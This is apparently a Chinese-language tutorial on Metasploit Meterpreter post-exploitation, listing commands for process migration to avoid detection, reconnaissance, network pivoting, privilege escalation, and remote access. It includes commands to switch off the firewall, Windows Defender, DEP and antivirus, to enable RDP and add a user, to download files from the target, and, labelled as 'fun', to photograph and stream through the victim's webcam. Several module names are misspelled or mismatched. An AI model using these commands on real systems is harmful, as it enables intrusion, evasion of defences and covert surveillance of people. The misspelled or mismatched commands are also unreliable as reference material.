后渗透攻击:信息收集
Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。
Meterpreter优势:
- 纯内存工作模式,不需要对磁盘进行任何写入操作
- 使用加密通信协议,可以同时与几个信道通信
- 在被攻击进程内工作,不需要创建新的进程
- 易于在多进程之间迁移
- 平台通用
- 进程迁移
获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到
获取目标机正在运行的进程:ps
输入getpid命令查看shell的进程号(pid),然后根据进程号对应ps命令查出来的name
查看shell的进程号:getpid
输入migrate 448命令把shell移动到pid为448的exe进程里,因为该进程是一个稳定的应用,完成进程迁移后,再次输入getpid命令查看shell的进程号
把shell进程迁移到(pid=448)的进程里:migrate 448
完成后,原先shell的进程会自动关闭,如果没有自动关闭可以输入 kill 984杀死该进程
手动关闭(pid=984)进程:kill 984
自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移
自动寻找合适的进程迁移:run post/windows/manage/migrate
- 系统命令
获得稳定的进程后,接下来收集系统信息
查看目标机的系统信息 sysinfo
检查目标机是否正在运行(最近的运行时间) idletime
查看目标机完整的网络设置 route
将当前会话放到后台 background
查看当前目标机上已经渗透成功的用户名 getuid
关闭目标机系统杀毒软件 run post/windows/manage/killav
启动远程桌面协议(3389) run post/windows/manage/enable_rdp
查看目标机的本地子网情况 run post/windows/manage/autoroute
可以借助被攻陷的主机对其他网络进行攻击:
添加路由 route add 192.168.43.0 255.255.255.0
查看路由情况 route print
列举当前那些用户登陆目标机 run post/windows/gather/enum_logged_on_users
列举安装在目标机上的应用程序 run post/windows/gather/enum_applications
获取目标机器的分区情况 run post/windows/gather/forensics/enum_drives
检查目标机是否运行在虚拟机上 run post/windows/gather/checkvm
开启服务 run post/windows/gather/enum_services
查看共享 run post/windwos/gather/enum_shares
获取主机最近的系统操作 run post/windows/gather/dumplinks
查看补丁 run post/windows/gather/enum_applications
几个好玩的命令:
对远程主机当前屏幕进行截图 screenshot
查看目标机有没有摄像头 webcam_list
打开目标机摄像头拍一张照片 webcam_snap
开启直播模式 webcam_stream
进入目标机的命令模式 shell
- 文件系统命令
Meterpreter支持各种文件系统命令,用于搜索文件并执行各种任务
pwd或getwd:查看当前处于目标机的哪个目录
getlwd:查看当前处于本地的哪个目录
ls:列出当前目录中的所有文件
cd:切换目录
search-f*.txt-d c: \:可以搜索C盘中所有以.txt为扩展名的文件,其中-f用于指定搜索文件模式,-d用于指定在哪个目录下进行搜索
download C: \test.txt/root:下载目标机C盘的test.txt文件到攻击机root下
upload/root/test.txt C:\:上传攻击机root目录下的test.txt文件到目标机C盘下
上述可以使我们获得更多关于目标机的信息,当然还包含很多文件系统命令,需要我们去了解。
后渗透攻击:权限提升
在渗透测试的过程中很有可能只获得了一个系统的Guest或者User权限,低的权限级别使我们受到了很多的限制,在实施横向渗透或者提权攻击时很困难,在主机上如果没有管理员权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guest提升到User再到admin最后到System级别,渗透的目的是获取服务器的最高权限,也就是Windows的管理员账号或linux的root权限。
- 提升权限的方式
纵向提权:低权限A获得高权限B的权限也称为权限升级
横向提权:获取同级别的权限,通过系统A获取了系统B的权限
后渗透攻击:关闭杀软
关闭防火墙:
netsh advfirewall set allprofiles state off
关闭Denfender:
net stop windefend
关闭DEP:
bcdedit.exe/set{current}nx alwaysoff
关闭杀毒软件:
run killav
run post/windows/manage/killava
后渗透攻击:远程连接
开启远程桌面:
run post/windows/manage/enable_rdp
run getgui -e
开启远程桌面并添加一个新用户:
run getgui -u xxx -p ean
开启远程桌面并绑定在8888端口:
run getgui -e -f 8888
截图:
load espia
screengrab
小知识
whoami/groups:查看当前的权限